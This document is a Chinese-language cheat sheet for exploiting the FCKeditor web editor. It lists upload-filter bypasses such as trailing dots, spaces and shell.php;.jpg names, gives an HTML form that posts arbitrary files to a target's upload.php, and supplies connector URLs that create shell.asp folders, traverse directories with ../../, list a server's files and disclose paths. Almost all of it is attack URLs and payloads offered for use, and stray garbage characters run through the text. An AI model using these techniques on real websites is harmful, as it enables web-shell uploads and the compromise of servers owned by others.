Fckeditor漏洞利用总结 查看编辑器版本
5 j0 X' O) k. SFCKeditor/_whatsnew.html# V% F9 s* H$ j1 g# V
————————————————————————————————————————————————————————————— 2. Version 2.2 版本% D/ \* b/ K8 c( S* q5 }2 G
Apache+linux 环境下在上传文件后面加个.突破!测试通过。3 Q7 ]5 z* R' h7 {' \
————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。$ G0 h2 o; i3 C: @
<form id="frmUpload" enctype="multipart/form-data", K3 i8 r: @/ d4 o
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>0 N" b& n* t- @' G3 l
<input type="file" name="NewFile" size="50"><br>
9 v. L# e* U, ~' ^% I, N<input id="btnUpload" type="submit" value="Upload">
+ M9 B% ^1 x% @, U& g; r% V</form>
$ y/ d6 v/ c+ j$ I; }————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法7 E" D& V" G3 s6 ^ Z, l
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。+ q8 ?: n; T6 U2 ?1 h$ `: @
4.1:提交shell.php+空格绕过
" \- [6 q. j" x不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
9 J9 I4 X) e2 U; B" Z2 m' @+ d 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
( d3 A* [; W4 h! g! |————————————————————————————————————————————————————————————— 5. 突破建立文件夹
& X0 Z" O4 D. |4 x( w8 MFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
) H" D, u! n: z8 F* q0 L- K; xFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
( D8 K. v7 H! c6 e" E1 w" r4 Y————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址 Q5 I7 D* e Y& f: b. H# t7 S
FCKeditor/editor/filemanager/browser/default/connectors/test.html5 d) `. Q) m5 n
FCKeditor/editor/filemanager/upload/test.html F* q& t9 V! M, I9 u
FCKeditor/editor/filemanager/connectors/test.html
9 M& b. u2 h, YFCKeditor/editor/filemanager/connectors/uploadtest.html
' [" _0 w& {: U1 j. Y2 c( r—————————————————————————————————————————————————————————————
! Z' A8 e' q% L6 u( }" Q' J' _ 7.常用上传地址# |; ?( ]4 P7 q; G d0 L) y, D
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
0 o' D; d/ u' Y) E/ _8 L; nFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp8 q; \) y7 j G m# P
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
* k( H6 ?) |3 Z$ o* H1 {3 B" EJSP 版:+ U F6 i: k c. t/ g5 t! J
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
u; z! |: f* n- Y' `4 W' ~注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文( x" `4 V& I( J- i( T0 _# W5 s+ c( X
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
7 d: m0 F8 U! E2 n+ j2 i————————————————————————————————————————————————————————————— 8.其他上传地址
& P. {$ F4 P' Q6 I! c5 |3 |# jFCKeditor/_samples/default.html
, {, G7 u1 k! W; ~ TFCKeditor/_samples/asp/sample01.asp
r$ o) ~6 U( H; V2 a& gFCKeditor/_samples/asp/sample02.asp) v8 O. m- Z2 Z! |$ m( p
FCKeditor/_samples/asp/sample03.asp
! z, r; T% w/ M% ]* Z2 _, }FCKeditor/_samples/asp/sample04.asp
2 l# j5 a- U. m: f4 [一般很多站点都已删除_samples 目录,可以试试。; u" y3 B4 H4 S+ }$ p% X
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。+ q# u w, ]' I2 K |: c
————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址* J. W) N0 H: h9 W
Version 2.4.1 测试通过7 d/ W! H1 @( H
修改CurrentFolder 参数使用 ../../来进入不同的目录
' j# c& V% u' [* B) d/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp. S6 M" e$ T: I! _
根据返回的XML 信息可以查看网站所有的目录。- h) {' b1 n6 O
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
+ Y$ s4 Z( N: ?; [; G7 R9 h1 S( ~也可以直接浏览盘符:
3 S- `# p& a) A/ H- MJSP 版本:
" ^9 q) U; L0 gFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F# M- q2 g+ n: B& Y( c8 o% j' ~
————————————————————————————————————————————————————————————— 10.爆路径漏洞' s/ r w) s! {
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
% Q2 e. h, y6 ~————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题4 g( H/ ?; a( `
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
* Z9 Q. O- K- ?5 N/ ~( }9 w脆弱描述:( Y9 s* K: n/ X4 P; I
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:' r% h3 w2 Z. D# s5 `
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm( s) Z& z O) b; s+ X
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
7 ]+ I8 _$ O( H$ G$ `7 \3 d 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
$ O; f0 H5 F+ y5 N' P1 E) `4 w- v* t8 P 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! |